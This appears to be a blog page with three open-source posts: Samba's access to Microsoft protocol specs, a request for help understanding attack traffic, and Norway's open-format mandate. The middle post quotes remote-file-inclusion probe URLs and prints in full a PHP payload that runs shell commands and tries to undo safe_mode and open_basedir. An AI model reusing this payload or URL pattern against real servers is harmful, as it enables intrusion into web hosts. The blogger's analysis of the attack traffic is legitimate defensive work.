Fantastic!

The EU vs. Microsoft litigation that finished a couple of months ago has finally bourne fruit. The Samba team now have royalty free access to the protocol documentation for Windows Workgroup protocols. Read the full story over on Groklaw. Massive thanks are due also to PJ for keeping the pressure on the EU so its judgement provided a way for Microsoft to deliver their protocol specs without encumbering users and developers with Patent restrictions and licenses.

Merry Christmas - This is a BIG deal for the Open Source Community and what a great way to finish what has been a pretty stonking year for OSS in general.

Tell Someone Else!

Over the last few days, I have had lots of site hits looking for rather strange URLs on this blog such as:

http://www.theopensourcerer.com/2007/10/25/upcoming-free-seminar//site.php?page=
http://www.erdc.cyc.edu.tw/4images/cache/rfi/test.txt???

I took a look at the file the url refers to. Here it is:

<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;

Can someone who understands PHP tell me what this is trying to do? It is clearly a scanning/hacking tool designed to retrieve data - I guess to help with further exploits. But I can’t quite work it out, especially the
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : "); line.

It’s a php script so why should it care if the site is on Windows or Linux? Any takers…

Tell Someone Else!

Following on from the very recent announcement from the Netherlands, the government of Norway has also stipulated that all public documents MUST be available in open standard file formats. [The English translation below is from Groklaw but not directly linkable]

Everyone should have equal access to public information: Open standards become compulsory within the government

The government has decided that all information on governmental websites should be available in the open formats HTML, PDF or ODF. With this decision the times when public documents where only available in Microsoft’s Word-format is coming to an end.

- Everybody should have equal access to public information. From 2009 the citizens will be able to chose which software to use in order to gain access to public information. The government’s decision will also improve the competition between suppliers of office applications, says IT-minister Heidi Grande Røys. This is the decision of the government:

* HTML should be the primary format for publication of public information on the Internet.

* PDF (1.4 or newer, or PDF/A - ISO 19005-1) is compulsory when you wish to preserve the original layout of a document.

* ODF (ISO/IEC 26300) must be used when publishing documents that are meant to be changed after downloading, eg. forms that are to be filled in by the user. - Norway’s Ministry of Government Administration and Reform

So, now two European (I know Norway is not truly part of the EEC but, like Switzerland, it is in Europe) countries have mandated Open standards for electronic documentation. I wonder how stupid the UK’s National Archive feel now? Or perhaps, because their management are Microsoft puppets, they didn’t really have a say in the first place…

Tell Someone Else!